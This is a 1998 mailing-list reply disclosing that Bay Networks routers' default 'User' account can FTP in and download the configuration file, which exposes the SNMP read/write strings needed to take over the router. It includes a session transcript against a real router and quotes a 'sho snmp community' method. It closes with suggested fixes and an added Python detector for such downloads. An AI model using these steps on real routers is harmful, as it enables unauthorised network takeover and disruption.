Re: Bay Networks Security Hole
From: jason () VIACCESS NET (Jason Ackley)
Date: Sun, 10 May 1998 11:02:41 -0400
On Sun, 10 May 1998, Marty Rigaletto wrote:
> vendor: bay networks
> product: bay access node/wellfleet routers
> on the machine is passworded by the administrator, however, the "User"
> account is often left untouched. While the "User" account has restricted
This is something I mentioned to them about 1yr ago, with no word /
Even if the box is not doing filtering and such, the 'User' Account can
be used to ftp into the Bay router (they run ftp daemons), download the
configuration file (yes, I have done this many times..), and then read it
into their Management program, in which you will have the snmp read/write
strings to do whatever you want with! Basically if the 'User' account is
open, the router can be taken over with very little effort.. Once you load
up the config file into the management console, you could toggle T1s, down
interfaces, reset BGP tables, capture packets.. You name it.
It would be wise to make it where the 'User' account cannot ftp in, or
cannot read the contents of the flash card..
Here is a sample random-bay-router-on-the-net(IP addr changed of course):
llama:/usr/home/jason/doc# ftp 126.96.36.199
Connected to 188.8.131.52.
220 WfFTP server(x12.00) ready.
Name (184.108.40.206:jason): User
230 User User logged in.
200 Type set to I.
ftp> get config
local: config remote: config
200 PORT command successful.
150 Image data connection for 2:config (220.127.116.11,20) (50140 bytes).
226 Binary Transfer Complete.
50140 bytes received in 2.01 seconds (24909 bytes/s)
200 PORT command successful.
150 ASCII data connection for 2: (18.104.22.168,0) (0 bytes).
Volume - drive 2:
Directory of 2:
File Name Size Date Day Time
config.isp 45016 08/22/97 Fri. 17:05:51
startup.cfg 7472 08/24/97 Sun. 23:31:31
asnboot.exe 237212 08/24/97 Sun. 23:31:41
asndiag.exe 259268 08/24/97 Sun. 23:32:28
debug.al 12372 08/24/97 Sun. 23:33:17
ti_asn.cfg 504 08/24/97 Sun. 23:33:31
install.bat 189114 08/24/97 Sun. 23:33:41
config 50140 04/20/98 Mon. 22:08:01
4194304 bytes - Total size
3375190 bytes - Available free space
3239088 bytes - Contiguous free space
226 ASCII Transfer Complete.
I have no idea what the current firmware rev is, as my current duties have
me away from Bay products, but in this example, the firmware was 12.00 it
looks like.. (This was testing 'just now').
> All a proposed attacker would have to do is telnet to the router, login
> as "User", and issue a single command, "sho snmp community". Then adjust
> his or her snmp software to use that string and IP address, and b00m,
> sucks to be you.
As far as I knew, the User level could not see the read/write string, but
I could be outdated.. But as shown above, you can get the config file using
a standard FTP client :)
The Fix? Well, as I said, tighten down what the 'User Level' account can
do, and leave things such as ftpd turned off by default. Of course,
removing the 'User' account would be a good idea too, as not too many
people use it and even more people are not even aware of it..
Jason Ackley jason () ackley net
UNIX Systems Consultant
"Learn UNIX and mingle with the gods.."
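
Added example, not part of the original post: a detection sketch that reads FTP control-channel server replies (as captured by a network sensor or session log) and flags a completed download of a configuration file by the 'User' account. The reply formats are copied from the transcript above; the function name, the watched-account list, the "Manager" login and the sample lines are constructed for illustration.

```python
import re

# Reply formats are taken from the WfFTP transcript in the post; treating them
# as stable across firmware revisions is an assumption.
LOGIN = re.compile(r"^230 User (\S+) logged in\.")
OPEN = re.compile(r"^150 (Image|ASCII) data connection for (\d+):(\S*) "
                  r"\(([\d.]+),(\d+)\) \((\d+) bytes\)\.")
DONE = re.compile(r"^226 .*Transfer Complete\.")
SENSITIVE = re.compile(r"^(config(\..+)?|.+\.cfg)$", re.IGNORECASE)


def find_config_pulls(replies, watched_accounts=("User",)):
    """Return one finding per completed config-file transfer by a watched account."""
    findings, user, pending = [], None, None
    for line in replies:
        line = line.strip()
        if m := LOGIN.match(line):
            user, pending = m.group(1), None
        elif m := OPEN.match(line):
            _mode, volume, name, client, _port, size = m.groups()
            # Directory listings open a data connection with an empty file name.
            pending = (volume, name, client, int(size)) if name else None
        elif DONE.match(line) and pending:
            volume, name, client, size = pending
            if user in watched_accounts and SENSITIVE.match(name):
                findings.append({"account": user, "client": client,
                                 "file": f"{volume}:{name}", "bytes": size})
            pending = None
    return findings


# Constructed sample: server replies modelled on the session in the post,
# with RFC 5737 documentation addresses. "Manager" is a constructed login.
SAMPLE = """\
220 WfFTP server(x12.00) ready.
230 User User logged in.
200 PORT command successful.
150 Image data connection for 2:config (192.0.2.10,20) (50140 bytes).
226 Binary Transfer Complete.
200 PORT command successful.
150 ASCII data connection for 2: (192.0.2.10,0) (0 bytes).
226 ASCII Transfer Complete.
230 User Manager logged in.
150 Image data connection for 2:startup.cfg (192.0.2.20,20) (7472 bytes).
226 Binary Transfer Complete.
""".splitlines()

if __name__ == "__main__":
    print(find_config_pulls(SAMPLE))
```

Only the first transfer in the sample is reported: the directory listing has no file name, and the second download is made by an account outside the watched list.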